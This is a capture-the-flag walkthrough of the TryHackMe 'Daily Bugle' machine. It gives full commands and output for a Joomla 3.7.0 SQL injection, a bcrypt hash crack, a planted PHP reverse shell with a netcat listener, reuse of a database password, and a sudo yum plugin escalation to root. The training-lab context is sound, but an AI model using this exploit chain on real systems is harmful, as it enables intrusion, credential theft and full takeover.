Skip to main content

Daily Bugle THM{}

Nmap

sudo nmap -A -sC -T4 10.10.208.57

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3306/tcp open  mysql   MariaDB (unauthorized)

Gobuster

gobuster dir -u http://10.10.208.57/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

/images               (Status: 301) [Size: 235] [--> http://10.10.208.57/images/]
/templates            (Status: 301) [Size: 238] [--> http://10.10.208.57/templates/]
/media                (Status: 301) [Size: 234] [--> http://10.10.208.57/media/]    
/modules              (Status: 301) [Size: 236] [--> http://10.10.208.57/modules/]  
/bin                  (Status: 301) [Size: 232] [--> http://10.10.208.57/bin/]      
/plugins              (Status: 301) [Size: 236] [--> http://10.10.208.57/plugins/]  
/includes             (Status: 301) [Size: 237] [--> http://10.10.208.57/includes/] 
/language             (Status: 301) [Size: 237] [--> http://10.10.208.57/language/] 
/components           (Status: 301) [Size: 239] [--> http://10.10.208.57/components/]
/cache                (Status: 301) [Size: 234] [--> http://10.10.208.57/cache/]     
/libraries            (Status: 301) [Size: 238] [--> http://10.10.208.57/libraries/] 
/tmp                  (Status: 301) [Size: 232] [--> http://10.10.208.57/tmp/]       
/layouts              (Status: 301) [Size: 236] [--> http://10.10.208.57/layouts/]   
/administrator        (Status: 301) [Size: 242] [--> http://10.10.208.57/administrator/]
/cli                  (Status: 301) [Size: 232] [--> http://10.10.208.57/cli/]

Joomla

Searching in Hacktricks, we find how to get a list of files and the version of Joomla

In /administrator/manifests/files/joomla.xml you could access a list of files inside the root folder, and version of Joomla.
In /language/en-GB/en-GB.xml you can get the version of Joomla.

Searchsploit and GitHub

With this tool, we can find an exploit for this version. searchsploit joomla 3.7.0

Joomla! 3.7.0 - 'com_fields' SQL Injection         php/webapps/42033.txt

searchsploit -p 42033

Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
      URL: https://www.exploit-db.com/exploits/42033
     Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text, with CRLF line terminators

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .

Now we open the exploit and find this line for sqlmap. sqlmap -u "http://10.10.192.240/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test

[15:08:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[15:08:40] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.192.240'
[15:08:40] [WARNING] your sqlmap version is outdated
We obtain that, so we can't continue with sqlmap.
Let's find anything else on GitHub searching `joomla 3.7.0`.
We find [joomblah.py](https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py) with the explanation of the vulnerability [HERE](https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html)

python3 joomblah.py http://10.10.192.240

[-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session

John

Now we paste the hast to a file and use John to crack it john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123     (?)
1g 0:00:06:15 DONE (2022-03-22 15:31) 0.002660g/s 124.6p/s 124.6c/s 124.6C/s thelma1..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Webpage

We go to \<IP>/administrator and use jonah / spiderman123. After enter to the administration panel, we identify that a php exploit can be upload and accessed.

After a little finding, we go to Templates and locate the index.php of beez3. Now we can change the php for the php-reverse-shell of pentestmonkey. PHP REVERSE SHELL. After that, we start a netcan listener: nc -lvnp 5555

listening on [any] 5555 ...
connect to [10.11.62.63] from (UNKNOWN) [10.10.6.7] 60746
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:40:24 up 11 min,  0 users,  load average: 0.00, 0.04, 0.07
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$

And now we have a user shell.

Reverse Shell

Let's improve our shell following this guide UPGRADE SHELL. Know we need to locate the flags. As we don't have permission to access to jjameson folder neither root folder, it's important to escalate privileges. For that let's use linpeash.sh

Searching passwords in config PHP files
        public $password = 'nv5uz9r3ZEDzVjNu';                                                                                                               
                        $this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
                        $this->password = null;
                        'password' => $this->password,

And also we find this

-rwxr-xr-x. 1 apache apache 8378 Apr 25  2017 /var/www/html/libraries/joomla/cache/storage.php
-rwxr-xr-x. 1 apache apache 4948 Apr 25  2017 /var/www/html/libraries/joomla/session/storage.php
-rwxr-xr-x. 1 apache apache 1060 Apr 25  2017 /var/www/html/administrator/components/com_installer/controllers/database.php
-rwxr-xr-x. 1 apache apache 7802 Apr 25  2017 /var/www/html/administrator/components/com_installer/models/database.php
-rwxr-xr-x. 1 apache apache 5876 Apr 25  2017 /var/www/html/libraries/fof/database/database.php
-rwxr-xr-x. 1 apache apache 5328 Apr 25  2017 /var/www/html/libraries/joomla/database/database.php
-rwxr-xr-x. 1 apache apache 3934 Apr 25  2017 /var/www/html/libraries/joomla/log/logger/database.php
-rwxr-xr-x. 1 apache apache 1455 Apr 25  2017 /var/www/html/libraries/joomla/model/database.php
-rwxr-xr-x. 1 apache apache 3978 Apr 25  2017 /var/www/html/libraries/joomla/session/storage/database.php

In the file configuration.php, we find this password nv5uz9r3ZEDzVjNu and we can use it with the user jjameson And the user flag is located there.

Privilege escalation

We run as jjameson linpeas.sh another time and find this:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum

So we go to https://gtfobins.github.io/#yum There, we find this code to become root.

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
sh-4.2# whoami
root